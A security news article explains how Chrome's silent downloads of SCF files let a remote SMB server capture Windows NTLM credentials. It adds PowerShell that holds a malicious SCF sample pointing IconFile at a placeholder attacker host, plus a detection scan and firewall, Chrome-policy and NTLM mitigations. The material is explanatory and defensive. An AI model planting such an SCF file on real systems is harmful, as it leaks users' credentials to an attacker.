Windows Password threatened by Chrome: hackers can steal your login remotely

A researcher, Bosko Stankovic of DefenseCode, found a worrying weakness in the default configuration of the latest Chrome browser version on any Windows operating system, including Windows 10. The flaw lets an attacker steal a remote user's Windows login credentials. According to the researcher, the victim only has to visit a website that serves a malicious SCF (Shell Command File); the PC then hands its login credentials to the attacker through a combination of Chrome's download behaviour and the SMB protocol.

All of this happens without the user noticing anything. The underlying trick is not new: a closely related one, a shortcut file whose icon Windows loads from an attacker-controlled path, was used by the Stuxnet malware, the potent threat built to sabotage the Iranian nuclear programme. What is new is that, for the first time, Chrome is the delivery vehicle.

As he explained in a blog post:

Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse the victim's authentication credentials.

Chrome downloads the SCF file from the malicious site automatically, without asking the user to confirm anything. As soon as the user opens the folder that holds the file (typically Downloads), Windows Explorer processes it in order to draw its icon; no click on the file is needed. An SCF file is a small text file, and its IconFile entry can point at a UNC path on a remote SMB server controlled by the attacker. Windows then tries to fetch the icon from that server and authenticates automatically, handing the attacker the username and an NTLM challenge-response hash of the password. That hash can be brute-forced offline to recover the plaintext password.
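As an added illustration (not code from the article or from DefenseCode), here is what such an SCF file looks like next to the harmless "Show Desktop" SCF it imitates, and a PowerShell check that flags any SCF in a folder whose icon would be loaded over a UNC path. The host name attacker.example is a placeholder, and the two samples are parsed as in-memory strings so that no trigger file is ever written where Explorer could render it:

```powershell
# Added example, not from the article or DefenseCode. Shows the SCF format
# that leaks NTLM credentials and a check that flags such files.
# 'attacker.example' is a placeholder host, not a real server.

# A classic, harmless SCF ("Show Desktop"): the icon comes from a local file.
$BenignScf = @"
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
"@

# The malicious variant: identical, except that IconFile is a UNC path.
# When Explorer lists the folder it fetches the icon, which makes Windows
# connect to the SMB server and authenticate with NTLM, no click required.
$MaliciousScf = @"
[Shell]
Command=2
IconFile=\\attacker.example\share\icon.ico
[Taskbar]
Command=ToggleDesktop
"@

# Returns the remote host named in an IconFile UNC path, or $null if the
# SCF content only references local icons.
function Get-ScfRemoteIconHost {
    param([Parameter(Mandatory)][string]$Content)
    foreach ($line in ($Content -split "`r?`n")) {
        # IconFile=\\host\share\...   (each '\\' in the regex is one backslash)
        if ($line -match '^\s*IconFile\s*=\s*\\\\([^\\]+)\\') {
            return $Matches[1]
        }
    }
    return $null
}

# Scans a folder for .scf files whose icon is loaded from a remote host.
function Find-ScfWithRemoteIcon {
    param([Parameter(Mandatory)][string]$Folder)
    Get-ChildItem -Path $Folder -Filter '*.scf' -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $remoteHost = Get-ScfRemoteIconHost -Content (Get-Content -Raw -Path $_.FullName)
            if ($remoteHost) {
                [pscustomobject]@{ File = $_.FullName; RemoteHost = $remoteHost }
            }
        }
}

# Check the two constructed samples in memory (nothing is written to disk).
"Benign    -> $(Get-ScfRemoteIconHost -Content $BenignScf)"      # empty
"Malicious -> $(Get-ScfRemoteIconHost -Content $MaliciousScf)"   # attacker.example

# On a real machine, sweep the folder Chrome downloads into:
Find-ScfWithRemoteIcon -Folder (Join-Path $env:USERPROFILE 'Downloads') | Format-Table -AutoSize
```

Running the sweep from a script avoids the very thing that triggers the leak: the check reads the files as text, whereas opening Downloads in Explorer would make Windows resolve every IconFile path, UNC ones included.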

Cracking the hash is not always necessary: the captured NTLM exchange can be relayed to other services that accept NTLM authentication, and on a PC whose Windows login is a Microsoft account, the credentials that leak are those of the Microsoft account, so a cracked password also opens OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and the like. This kind of flaw is a real threat to large companies as well as to home users, because it makes taking control of IT resources easy. Google is working on a patch.

How to prevent such SMB attacks

To guard against such attacks, block outbound SMB connections (TCP ports 139 and 445) from the local network to the internet at the perimeter firewall, so that the victim's machine can never reach the attacker's SMB server. Be aware that if the WebClient service is running, Windows may fall back to WebDAV over HTTP when the SMB connection fails, so blocking SMB alone is not a complete fix. More simply, stop Chrome's silent downloads: go to Chrome > Settings > Show advanced settings > Downloads and tick "Ask where to save each file before downloading". You will then have to approve every download, and an unexpected SCF file can be declined before it ever lands in your Downloads folder.
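The two mitigations above as an administrator would apply them on a single Windows host from an elevated PowerShell prompt, as an added example that is not part of the original article. The firewall rule approximates the perimeter block on the host itself, the rule and policy names are my own choices, and the NTLM restriction at the end is a defence-in-depth step beyond the article that can break access to NTLM-only file shares, so test it before rolling it out:

```powershell
# Added example, not from the original article. Run from an elevated
# PowerShell prompt. Names such as the rule display name are arbitrary.

# 1. Block outbound SMB (TCP 139/445) from this host to non-local addresses,
#    so a UNC IconFile path can never reach an attacker's SMB server.
#    'Internet' is one of the built-in address keywords of the firewall.
New-NetFirewallRule -DisplayName 'Block outbound SMB to Internet' `
    -Direction Outbound -Protocol TCP -RemotePort 139,445 `
    -RemoteAddress Internet -Action Block -Profile Any | Out-Null

# 2. Make Chrome ask where to save every download. This is the managed-policy
#    form of the "Ask where to save each file before downloading" checkbox,
#    so an SCF cannot land in Downloads without the user seeing a prompt.
$ChromePolicy = 'HKLM:\SOFTWARE\Policies\Google\Chrome'
New-Item -Path $ChromePolicy -Force | Out-Null
Set-ItemProperty -Path $ChromePolicy -Name 'PromptForDownloadLocation' -Value 1 -Type DWord

# 3. Beyond the article: refuse to send NTLM to remote servers at all, so even
#    a reachable SMB (or WebDAV) server receives no hash. 2 = "Deny all" for
#    "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers".
#    This breaks NTLM-only shares; consider value 1 (audit) first.
$Lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
Set-ItemProperty -Path $Lsa -Name 'RestrictSendingNTLMTraffic' -Value 2 -Type DWord

# Verify what was applied.
Get-NetFirewallRule -DisplayName 'Block outbound SMB to Internet' |
    Get-NetFirewallPortFilter | Select-Object Protocol, RemotePort
Get-ItemProperty -Path $ChromePolicy -Name 'PromptForDownloadLocation'
Get-ItemProperty -Path $Lsa -Name 'RestrictSendingNTLMTraffic'
```

Chrome reads the policy key at startup, so restart the browser after step 2; the NTLM setting in step 3 takes effect for new connections without a reboot.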
